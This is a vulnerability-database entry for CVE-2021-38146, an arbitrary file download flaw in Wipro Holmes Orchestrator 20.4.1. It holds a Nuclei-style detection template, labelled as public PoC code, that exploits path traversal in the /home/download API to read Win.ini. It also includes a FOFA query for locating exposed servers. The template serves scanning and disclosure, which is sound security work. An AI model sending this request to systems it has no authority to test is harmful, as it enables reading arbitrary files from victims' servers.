漏洞描述
The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
CVE-2021-38146: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
PoC代码[已公开]
id: CVE-2021-38146
info:
name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download
author: s4e-io
severity: high
description: |
The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data.
remediation: Fixed In v21.4.0
reference:
- https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html
- https://flippingbitz.com/post/wipro-ho-2041-cve/
- https://www.wipro.com/holmes/
- https://nvd.nist.gov/vuln/detail/CVE-2021-38146
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-38146
cwe-id: CWE-22
epss-score: 0.45088
epss-percentile: 0.97521
cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wipro
product: holmes
fofa-query: title="Wipro Holmes Orchestrator"
tags: cve,cve2021,wipro,holmes,lfi
http:
- method: POST
path:
- "{{BaseURL}}/home/download"
headers:
Content-Type: application/json
body: |
{
"SearchString": "C:/Windows/Win.ini",
"Msg": ""
}
matchers-condition: and
matchers:
- type: word
words:
- "[fonts]"
- "[extensions]"
- "[files]"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502205c523745421de58cefb0825e568ea64e441bcfff65c8b5786583ed99a5baca91022100c89d4f89028716e353e03cfa806a1391f43d5d119ccffcbd7e98f6cb84f82a3e:922c64590222798bb761d5b6d8e72950